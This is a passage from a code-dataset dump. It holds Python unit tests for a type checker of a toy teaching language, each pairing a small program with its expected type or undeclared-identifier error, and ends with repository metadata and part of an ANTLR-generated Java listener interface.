str(TypeMismatchInStatement(For(Id(\"x\"),IntLiteral(1),BinaryOp(\"\"\">\"\"\",Id(\"x\"),IntLiteral(1)),BinaryOp(\"\"\"+.\"\"\",FloatLiteral(0.0),FloatLiteral(1.0)),([],[]))))\n\n self.assertTrue(TestChecker.test(input,expect,447))\n \n def test_return_type_6(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n For (x = True, x>1 , 0 + 1) Do\n EndFor.\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(For(Id(\"x\"),BooleanLiteral(True),BinaryOp(\"\"\">\"\"\",Id(\"x\"),IntLiteral(1)),BinaryOp(\"\"\"+\"\"\",IntLiteral(0),IntLiteral(1)),([],[]))))\n\n self.assertTrue(TestChecker.test(input,expect,448))\n \n def test_return_type_7(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n For (x = 1, x + 1 , 0 + 1) Do\n EndFor.\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(For(Id(\"x\"),IntLiteral(1),BinaryOp(\"\"\"+\"\"\",Id(\"x\"),IntLiteral(1)),BinaryOp(\"\"\"+\"\"\",IntLiteral(0),IntLiteral(1)),([],[]))))\n\n self.assertTrue(TestChecker.test(input,expect,449))\n \n def test_return_type_8(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n For (x = 1, False , y) Do\n EndFor.\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,450))\n \n def test_assign_stmt(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y\n Body:\n Var: a = 1;\n y = a + foo(x);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Assign(Id(\"y\"),BinaryOp(\"\"\"+\"\"\",Id(\"a\"),CallExpr(Id(\"foo\"),[Id(\"x\")])))))\n\n self.assertTrue(TestChecker.test(input,expect,451))\n \n def test_assign_stmt_2(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y\n Body:\n Var: a = 1;\n x = 1;\n y = a + foo(x);\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n\n self.assertTrue(TestChecker.test(input,expect,452))\n \n def test_assign_stmt_3(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y\n Body:\n Var: a = 1;\n x = 1;\n y = a + foo(x);\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n\n self.assertTrue(TestChecker.test(input,expect,453))\n \n def test_assign_stmt_4(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y\n Body:\n Var: a = 1;\n x = 1;\n y = a + foo(x, foo(x, 1));\n Return;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n\n self.assertTrue(TestChecker.test(input,expect,454))\n \n def test_assign_stmt_5(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a = 1;\n x = 1;\n y[1] = a;\n Return;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"y\"),[IntLiteral(1)])))\n\n self.assertTrue(TestChecker.test(input,expect,455))\n \n def test_assign_stmt_6(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a = 1;\n x = 1;\n y[1][2] = a;\n Return;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,456))\n \n def test_assign_stmt_7(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a = 1;\n x = 1;\n y = a;\n Return;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"y\"),Id(\"a\"))))\n \n self.assertTrue(TestChecker.test(input,expect,457))\n \n def test_58(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"x\"))))\n\n self.assertTrue(TestChecker.test(input,expect,458))\n \n def test_59(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n a[1+1][0.5+.1.5] = 1;\n Return a;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"a\"),[BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(1)),BinaryOp(\"\"\"+.\"\"\",FloatLiteral(0.5),FloatLiteral(1.5))])))\n\n self.assertTrue(TestChecker.test(input,expect,459))\n \n def test_60(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n a[1+1][x] = y;\n Return a;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(ArrayCell(Id(\"a\"),[BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(1)),Id(\"x\")]),Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,460))\n \n def test_61(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][0.5]=1;\n Return a;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[Id(\"x\")])))\n\n self.assertTrue(TestChecker.test(input,expect,461))\n \n def test_501(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][0.5]=1;\n Return a;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Assign(ArrayCell(CallExpr(Id(\"foo\"),[Id(\"x\")]),[BinaryOp(\"\"\"+\"\"\",Id(\"x\"),IntLiteral(3)),FloatLiteral(0.5)]),IntLiteral(1))))\n \n\n self.assertTrue(TestChecker.test(input,expect,501))\n \n def test_62(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][0.5]=1;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[Id(\"x\")])))\n\n self.assertTrue(TestChecker.test(input,expect,462))\n \n def test_63(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y\n Body:\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][0.5]=1;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n self.assertTrue(TestChecker.test(input,expect,463))\n \n def test_64(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][0.5]=1;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(CallExpr(Id(\"foo\"),[Id(\"x\")]),[BinaryOp(\"\"\"+\"\"\",Id(\"x\"),IntLiteral(3)),FloatLiteral(0.5)])))\n\n self.assertTrue(TestChecker.test(input,expect,464))\n \n # def test_65(self):\n # input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n # Function: foo\n # Parameter: x\n # Body:\n # Return y;\n # EndBody.\n # Function: main\n # Parameter: x\n # Body:\n # Var: a[1][2];\n # foo(x)[x+3][2]=1;\n # Return a;\n # EndBody.\n # \"\"\"\n # expect = str()\n # self.assertTrue(TestChecker.test(input,expect,502))\n \n def test_65(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,465))\n \n def test_66(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n If True Then\n ElseIf True Then\n Return a;\n EndIf.\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(Undeclared(Variable(), \"a\"))\n\n self.assertTrue(TestChecker.test(input,expect,466))\n \n def test_67(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var: a = 1;\n If a Then\n ElseIf True Then\n a = 12;\n EndIf.\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(If([(Id(\"a\"),[],[]),(BooleanLiteral(True),[],[Assign(Id(\"a\"),IntLiteral(12))])],[])))\n \n self.assertTrue(TestChecker.test(input,expect,467))\n \n def test_68(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var: a = True;\n If a Then\n ElseIf True Then\n a = 12;\n EndIf.\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),IntLiteral(12))))\n\n self.assertTrue(TestChecker.test(input,expect,468))\n \n def test_69(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var: a = True;\n If a Then\n ElseIf True Then\n a = False;\n EndIf.\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,469))\n \n def test_70(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = a + b || c - d;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"+\"\"\",Id(\"a\"),Id(\"b\")),BinaryOp(\"\"\"-\"\"\",Id(\"c\"),Id(\"d\")))))\n\n self.assertTrue(TestChecker.test(input,expect,470))\n\n def test_71(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || c >. d;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\">.\"\"\",BinaryOp(\"\"\"||\"\"\",Id(\"b\"),Id(\"c\")),Id(\"d\"))))\n\n self.assertTrue(TestChecker.test(input,expect,471))\n \n def test_72(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,472))\n \n def test_73(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n a = 1;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),IntLiteral(1))))\n \n self.assertTrue(TestChecker.test(input,expect,473))\n \n def test_74(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n a = c;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),Id(\"c\"))))\n \n self.assertTrue(TestChecker.test(input,expect,474))\n \n def test_75(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c - b;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"-\"\"\",Id(\"c\"),Id(\"b\"))))\n\n \n self.assertTrue(TestChecker.test(input,expect,476))\n \n def test_77(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c - d;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"-\"\"\",Id(\"c\"),Id(\"d\"))))\n \n self.assertTrue(TestChecker.test(input,expect,477))\n \n def test_78(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c -. d;\n y = c;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"y\"),Id(\"c\"))))\n \n self.assertTrue(TestChecker.test(input,expect,478))\n \n def test_79(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c -. d;\n y[1][1] = c;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[Id(\"x\")])))\n\n self.assertTrue(TestChecker.test(input,expect,479))\n \n def test_102(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c -. d;\n y[1][1] = c && d;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"&&\"\"\",Id(\"c\"),Id(\"d\"))))\n\n self.assertTrue(TestChecker.test(input,expect,502))\n \n def test_80(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c -. d;\n y[1][1] = c && d;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"&&\"\"\",Id(\"c\"),Id(\"d\"))))\n\n self.assertTrue(TestChecker.test(input,expect,480))\n \n def test_81(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,3};\n main(a);\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,481))\n \n def test_82(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,3};\n main(a[1]);\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,482))\n \n def test_83(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2.,3.};\n main(a[2]);\n main(b);\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[Id(\"b\")])))\n\n self.assertTrue(TestChecker.test(input,expect,483))\n \n def test_84(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a[2]);\n main(b[2]);\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,484))\n \n def test_85(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(Id(\"x\"))))\n\n self.assertTrue(TestChecker.test(input,expect,485))\n \n def test_86(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x = 1;\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),IntLiteral(1))))\n\n self.assertTrue(TestChecker.test(input,expect,486))\n \n def test_87(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = True;\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(ArrayCell(Id(\"x\"),[IntLiteral(1)]),BooleanLiteral(True))))\n\n self.assertTrue(TestChecker.test(input,expect,487))\n \n def test_88(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = 1;\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(Id(\"x\"))))\n\n self.assertTrue(TestChecker.test(input,expect,488))\n \n def test_89(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = 1;\n Return;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,489))\n \n def test_90(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,490))\n \n def test_91(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a=4;\n Var: b=21;\n Var: c=6;\n Var: d=\"Hello\";\n z= !e;\n a = (b==c) && !d;\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(), \"e\"))\n\n self.assertTrue(TestChecker.test(input,expect,491))\n \n def test_92(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a=4;\n Var: b=21;\n Var: c=6;\n Var: d=\"Hello\";\n z= !True;\n a = (b==c) && !d;\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(UnaryOp(\"\"\"!\"\"\",Id(\"d\"))))\n\n self.assertTrue(TestChecker.test(input,expect,492))\n \n def test_93(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a=4;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b==c) && !bool_of_string(d);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"==\"\"\",Id(\"b\"),Id(\"c\")),UnaryOp(\"\"\"!\"\"\",CallExpr(Id(\"bool_of_string\"),[Id(\"d\")]))))))\n\n self.assertTrue(TestChecker.test(input,expect,493))\n \n def test_94(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a=4;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b==c) && !bool_of_string(c);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"bool_of_string\"),[Id(\"c\")])))\n\n self.assertTrue(TestChecker.test(input,expect,494))\n \n def test_95(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a=4;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>.c) && !bool_of_string(d);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\">.\"\"\",Id(\"b\"),Id(\"c\"))))\n\n self.assertTrue(TestChecker.test(input,expect,495))\n \n def test_96(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>c) && !bool_of_string(d);\n Return -.a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(UnaryOp(\"\"\"-.\"\"\",Id(\"a\"))))\n\n self.assertTrue(TestChecker.test(input,expect,496))\n \n def test_97(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>c) && !bool_of_string(d);\n Return !!a && b;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"&&\"\"\",UnaryOp(\"\"\"!\"\"\",UnaryOp(\"\"\"!\"\"\",Id(\"a\"))),Id(\"b\"))))\n\n self.assertTrue(TestChecker.test(input,expect,497))\n \n def test_98(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>c) && !bool_of_string(d);\n Return bool_of_string(d);\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"x\"),[IntLiteral(1)])))\n\n self.assertTrue(TestChecker.test(input,expect,498))\n \n def test_99(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>c) && !bool_of_string(d);\n Return bool_of_string(d);\n EndBody.\n Function: main\n Parameter: x\n Body:\n x = x && 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"&&\"\"\",Id(\"x\"),IntLiteral(1))))\n\n self.assertTrue(TestChecker.test(input,expect,499))\n \n def test_100(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>c) && !bool_of_string(d);\n Return \"nothing\" && True;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x = x && 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"&&\"\"\",StringLiteral(\"\"\"nothing\"\"\"),BooleanLiteral(True))))\n\n self.assertTrue(TestChecker.test(input,expect,500))" }, { "alpha_fraction": 0.7180936932563782, "alphanum_fraction": 0.7334410548210144, "avg_line_length": 30.769229888916016, "blob_id": "8059debb2e83c338a4d88c13cc2f3d5b6d85797d", "content_id": "cee2a7240a1bb04fca2626a0fc4804de5f8f7b3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1238, "license_type": "no_license", "max_line_length": 74, "num_lines": 39, "path": "/LexicalAnalysis/Question3Listener.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from Question3.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.tree.ParseTreeListener;\n\n/**\n * This interface defines a complete listener for a parse tree produced by\n * {@link Question3Parser}.\n */\npublic interface Question3Listener extends ParseTreeListener {\n\t/**\n\t * Enter a parse tree produced by {@link Question3Parser#program}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterProgram(Question3Parser.ProgramContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link Question3Parser#program}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitProgram(Question3Parser.ProgramContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link Question3Parser#number}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterNumber(Question3Parser.NumberContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link Question3Parser#number}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitNumber(Question3Parser.NumberContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link Question3Parser#string}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterString(Question3Parser.StringContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link 